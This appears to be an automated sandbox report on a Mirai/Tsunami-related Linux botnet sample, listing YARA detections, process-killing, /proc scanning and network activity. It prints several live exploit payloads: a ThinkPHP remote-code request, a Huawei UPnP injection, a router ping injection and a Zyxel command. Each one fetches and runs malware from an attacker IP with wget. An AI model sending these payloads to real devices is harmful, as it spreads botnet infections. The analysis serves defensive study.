Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0

System Summary

Malicious sample detected (through community Yara rule)

Source: qJlf2SjoW4, type: SAMPLE	Matched rule: Detects ELF malware Mirai related Author: Florian Roth
Source: 6232.1.000000005174e606.000000008584956c.r-x.sdmp, type: MEMORY	Matched rule: Detects ELF malware Mirai related Author: Florian Roth
Source: 6236.1.000000005174e606.000000008584956c.r-x.sdmp, type: MEMORY	Matched rule: Detects ELF malware Mirai related Author: Florian Roth

Sample tries to kill multiple processes (SIGKILL)

Source: /tmp/qJlf2SjoW4 (PID: 6248)	SIGKILL sent: pid: 936, result: successful
Source: /tmp/qJlf2SjoW4 (PID: 6248)	SIGKILL sent: pid: 720, result: successful
Source: /tmp/qJlf2SjoW4 (PID: 6248)	SIGKILL sent: pid: 759, result: successful
Source: /tmp/qJlf2SjoW4 (PID: 6248)	SIGKILL sent: pid: 761, result: successful
Source: /tmp/qJlf2SjoW4 (PID: 6248)	SIGKILL sent: pid: 788, result: successful
Source: /tmp/qJlf2SjoW4 (PID: 6248)	SIGKILL sent: pid: 797, result: successful
Source: /tmp/qJlf2SjoW4 (PID: 6248)	SIGKILL sent: pid: 799, result: successful
Source: /tmp/qJlf2SjoW4 (PID: 6248)	SIGKILL sent: pid: 800, result: successful
Source: /tmp/qJlf2SjoW4 (PID: 6248)	SIGKILL sent: pid: 847, result: successful
Source: /tmp/qJlf2SjoW4 (PID: 6248)	SIGKILL sent: pid: 884, result: successful
Source: /tmp/qJlf2SjoW4 (PID: 6248)	SIGKILL sent: pid: 1334, result: successful
Source: /tmp/qJlf2SjoW4 (PID: 6248)	SIGKILL sent: pid: 1335, result: successful
Source: /tmp/qJlf2SjoW4 (PID: 6248)	SIGKILL sent: pid: 1389, result: successful
Source: /tmp/qJlf2SjoW4 (PID: 6248)	SIGKILL sent: pid: 1633, result: successful
Source: /tmp/qJlf2SjoW4 (PID: 6248)	SIGKILL sent: pid: 1809, result: successful
Source: /tmp/qJlf2SjoW4 (PID: 6248)	SIGKILL sent: pid: 1860, result: successful
Source: /tmp/qJlf2SjoW4 (PID: 6248)	SIGKILL sent: pid: 1872, result: successful
Source: /tmp/qJlf2SjoW4 (PID: 6248)	SIGKILL sent: pid: 1983, result: successful
Source: /tmp/qJlf2SjoW4 (PID: 6248)	SIGKILL sent: pid: 2048, result: successful
Source: /tmp/qJlf2SjoW4 (PID: 6248)	SIGKILL sent: pid: 2069, result: successful
Source: /tmp/qJlf2SjoW4 (PID: 6248)	SIGKILL sent: pid: 2096, result: successful
Source: /tmp/qJlf2SjoW4 (PID: 6248)	SIGKILL sent: pid: 2097, result: successful
Source: /tmp/qJlf2SjoW4 (PID: 6248)	SIGKILL sent: pid: 2102, result: successful

Source: qJlf2SjoW4, type: SAMPLE	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), score = , modified = 2022-05-13
Source: qJlf2SjoW4, type: SAMPLE	Matched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
Source: 6232.1.0000000085a0537c.000000003b1b2593.rw-.sdmp, type: MEMORY	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), score = , modified = 2022-05-13
Source: 6236.1.0000000085a0537c.000000003b1b2593.rw-.sdmp, type: MEMORY	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), score = , modified = 2022-05-13
Source: 6232.1.000000005174e606.000000008584956c.r-x.sdmp, type: MEMORY	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), score = , modified = 2022-05-13
Source: 6232.1.000000005174e606.000000008584956c.r-x.sdmp, type: MEMORY	Matched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
Source: 6236.1.000000005174e606.000000008584956c.r-x.sdmp, type: MEMORY	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), score = , modified = 2022-05-13
Source: 6236.1.000000005174e606.000000008584956c.r-x.sdmp, type: MEMORY	Matched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research

Source: /tmp/qJlf2SjoW4 (PID: 6248)	SIGKILL sent: pid: 936, result: successful
Source: /tmp/qJlf2SjoW4 (PID: 6248)	SIGKILL sent: pid: 720, result: successful
Source: /tmp/qJlf2SjoW4 (PID: 6248)	SIGKILL sent: pid: 759, result: successful
Source: /tmp/qJlf2SjoW4 (PID: 6248)	SIGKILL sent: pid: 761, result: successful
Source: /tmp/qJlf2SjoW4 (PID: 6248)	SIGKILL sent: pid: 788, result: successful
Source: /tmp/qJlf2SjoW4 (PID: 6248)	SIGKILL sent: pid: 797, result: successful
Source: /tmp/qJlf2SjoW4 (PID: 6248)	SIGKILL sent: pid: 799, result: successful
Source: /tmp/qJlf2SjoW4 (PID: 6248)	SIGKILL sent: pid: 800, result: successful
Source: /tmp/qJlf2SjoW4 (PID: 6248)	SIGKILL sent: pid: 847, result: successful
Source: /tmp/qJlf2SjoW4 (PID: 6248)	SIGKILL sent: pid: 884, result: successful
Source: /tmp/qJlf2SjoW4 (PID: 6248)	SIGKILL sent: pid: 1334, result: successful
Source: /tmp/qJlf2SjoW4 (PID: 6248)	SIGKILL sent: pid: 1335, result: successful
Source: /tmp/qJlf2SjoW4 (PID: 6248)	SIGKILL sent: pid: 1389, result: successful
Source: /tmp/qJlf2SjoW4 (PID: 6248)	SIGKILL sent: pid: 1633, result: successful
Source: /tmp/qJlf2SjoW4 (PID: 6248)	SIGKILL sent: pid: 1809, result: successful
Source: /tmp/qJlf2SjoW4 (PID: 6248)	SIGKILL sent: pid: 1860, result: successful
Source: /tmp/qJlf2SjoW4 (PID: 6248)	SIGKILL sent: pid: 1872, result: successful
Source: /tmp/qJlf2SjoW4 (PID: 6248)	SIGKILL sent: pid: 1983, result: successful
Source: /tmp/qJlf2SjoW4 (PID: 6248)	SIGKILL sent: pid: 2048, result: successful
Source: /tmp/qJlf2SjoW4 (PID: 6248)	SIGKILL sent: pid: 2069, result: successful
Source: /tmp/qJlf2SjoW4 (PID: 6248)	SIGKILL sent: pid: 2096, result: successful
Source: /tmp/qJlf2SjoW4 (PID: 6248)	SIGKILL sent: pid: 2097, result: successful
Source: /tmp/qJlf2SjoW4 (PID: 6248)	SIGKILL sent: pid: 2102, result: successful

Source: ELF static info symbol of initial sample

.symtab present: no

Source: Initial sample	String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://103.136.43.52/bin+-O+/tmp/gaf;sh+/tmp/gaf`&ipv=0
Source: Initial sample	String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.136.43.52 -l /tmp/binary -r /bins/Tsunami.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary Tsunami.Huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: Initial sample	String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://103.136.43.52/bin+-O+/tmp/gaf;sh+/tmp/gaf`&ipv=0POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Source: Initial sample	String containing 'busybox' found: /bin/busybox wget http://103.136.43.52/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Source: Initial sample	String containing 'busybox' found: /bin/busybox wget http://103.136.43.52/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh/dev/null

Source: classification engine

Classification label: mal92.spre.troj.lin@0/0@0/0

Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/1582/exe
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/2033/exe
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/1612/exe
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/1579/exe
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/1699/exe
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/1335/exe
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/1698/exe
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/2028/exe
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/1334/exe
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/1576/exe
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/2025/exe
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/910/exe
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/912/fd
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/912/exe
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/759/fd
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/759/exe
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/517/exe
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/918/fd
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/918/exe
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/1594/exe
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/1349/exe
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/1/fd
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/1623/exe
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/761/fd
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/761/exe
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/1622/exe
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/884/fd
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/884/exe
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/1983/exe
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/2038/exe
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/1344/exe
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/1465/exe
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/1586/exe
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/1860/exe
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/1463/exe
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/800/fd
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/800/exe
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/801/fd
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/801/exe
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/1629/exe
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/1627/exe
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/1900/exe
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/491/fd
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/491/exe
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/2050/exe
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/1877/exe
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/772/fd
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/772/exe
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/1633/exe
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/1599/exe
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/1632/exe
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/774/fd
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/774/exe
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/1477/exe
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/654/exe
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/896/exe
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/1476/exe
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/1872/exe
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/2048/exe
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/655/exe
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/1475/exe
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/777/fd
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/777/exe
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/656/exe
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/657/exe
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/658/fd
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/658/exe
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/936/fd
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/936/exe
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/419/exe
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/1639/exe
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/1638/exe
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/1809/exe
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/1494/exe
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/1890/exe
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/2063/exe
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/2062/exe
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/1888/exe
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/1886/exe
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/420/exe
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/1489/exe
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/785/fd
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/785/exe
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/1642/exe
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/667/exe
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/788/fd
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/788/exe
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/789/fd
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/789/exe
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/1648/exe
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/2078/exe
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/2077/exe
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/2074/exe
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/670/exe
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/793/fd
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/793/exe
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/1656/exe
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/1654/exe
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/674/exe
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/1532/exe
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/675/exe
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/796/fd
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/796/exe
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/676/exe
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/797/fd
Source: /tmp/qJlf2SjoW4 (PID: 6248)	File opened: /proc/797/exe

Source: /usr/bin/xfce4-session (PID: 6319)

Rm executable: /usr/bin/rm -> rm -f /home/saturnino/.cache/sessions/Thunar-2ec9153f1-6fa0-4067-96b1-e5fe875b1e51

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 43430 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 37452 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 40306 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 59744 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 53118 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 46802 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 54364 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 37215 -> 40306
Source: unknown	Network traffic detected: HTTP traffic on port 55878 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54234 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 46486 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 44132 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 47106 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 55555 -> 46486
Source: unknown	Network traffic detected: HTTP traffic on port 51688 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 54234 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 54234 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 51688 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 38390 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 45748 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 45898 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 38390 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 54234 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 38390 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 51688 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 35320 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 35834 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 45748 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 45898 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 38390 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 45748 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 45898 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 51688 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 45748 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 45898 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 33988 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 48884 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 38076 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 52070 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58940 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 54786 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 33580 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 33580 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 51688 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 33580 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 45748 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 34822 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 56924 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 56924 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 45898 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 56924 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 33580 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 56924 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 35642 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 56572 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 34288 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 39336 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 39658 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 41018 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33946 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 41308 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 40976 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 40976 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 33580 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 40976 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 44980 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 33828 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 46236 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 48576 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 53968 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 51688 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 45748 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 45898 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 40976 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 47334 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 55574 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 50308 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 46958 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37024 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 47334 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 57702 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47334 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 50308 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 37024 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 57702 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46958 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50308 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 47334 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 53716 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 33478 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 41954 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 59972 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 37024 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 44536 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 59972 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 57702 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59972 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 46958 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44536 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 40976 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 43450 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 37215 -> 43450
Source: unknown	Network traffic detected: HTTP traffic on port 37024 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 50308 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 39546 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 38124 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 42204 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 59972 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 44536 -> 55555
